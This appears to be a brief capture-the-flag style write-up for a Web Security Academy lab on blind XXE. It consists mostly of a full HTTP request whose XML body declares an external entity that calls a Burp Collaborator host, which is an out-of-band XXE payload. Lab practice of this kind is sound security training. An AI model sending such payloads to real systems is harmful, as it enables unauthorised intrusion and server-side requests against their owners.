we found a blind XXE so we wiil send by load with our collaborator link :

POST /product/stock HTTP/2
Host: 0aed002403bd218683c5b17c006f0058.web-security-academy.net
Cookie: session=9u9sX45kFyXn7FCN3BmK4bgZZMYAoWxn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://0aed002403bd218683c5b17c006f0058.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 234
Origin: https://0aed002403bd218683c5b17c006f0058.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE tset [ <!ENTITY poc SYSTEM "http://zpsqbs87lobiusk3val5yv2stjzdn2.burpcollaborator.net"> ]>
<stockCheck>
<productId>
&poc;
</productId>
<storeId>1
</storeId>
</stockCheck>